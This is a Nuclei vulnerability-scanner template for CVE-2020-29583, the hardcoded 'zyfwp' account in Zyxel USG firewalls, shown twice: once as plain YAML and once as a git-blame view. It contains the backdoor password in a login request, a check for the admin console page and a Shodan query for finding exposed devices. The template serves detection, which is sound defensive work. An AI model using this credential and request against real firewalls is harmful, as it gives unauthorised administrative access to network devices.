nuclei-templates/http/cves/2020/CVE-2020-29583.yaml

id: CVE-2020-29583

info:
  name: ZyXel USG - Hardcoded Credentials
  author: canberbamber
  severity: critical
  description: |
    A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
  reference:
    - https://www.zyxel.com/support/CVE-2020-29583.shtml
    - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29583
    - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29583
    cwe-id: CWE-522
  metadata:
    max-request: 2
    verified: "true"
    shodan-query: title:"USG FLEX 100"
  tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev

http:
  - raw:
      - |
        GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /ext-js/index.html HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - 'data-qtip="Web Console'
          - 'CLI'
          - 'Configuration"></a>'
        condition: and

      - type: status
        status:
          - 200
updated matchers,path,info 2023-05-25 18:18:57 +00:00			`id: CVE-2020-29583`

			`info:`
			`name: ZyXel USG - Hardcoded Credentials`
			`author: canberbamber`
			`severity: critical`
			`description: \|`
			`A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.`
			`reference:`
			`- https://www.zyxel.com/support/CVE-2020-29583.shtml`
			`- https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-29583`
			`- https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2020-29583`
			`cwe-id: CWE-522`
			`metadata:`
			`max-request: 2`
			`verified: "true"`
			`shodan-query: title:"USG FLEX 100"`
Auto Generated CVE annotations [Sat Jun 3 18:56:35 UTC 2023] :robot: 2023-06-03 18:56:35 +00:00			`tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev`
updated matchers,path,info 2023-05-25 18:18:57 +00:00
			`http:`
			`- raw:`
			`- \|`
			`GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1`
			`Host: {{Hostname}}`

			`- \|`
			`GET /ext-js/index.html HTTP/1.1`
			`Host: {{Hostname}}`

			`cookie-reuse: true`
			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body_2`
			`words:`
			`- 'data-qtip="Web Console'`
			`- 'CLI'`
			`- 'Configuration"></a>'`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`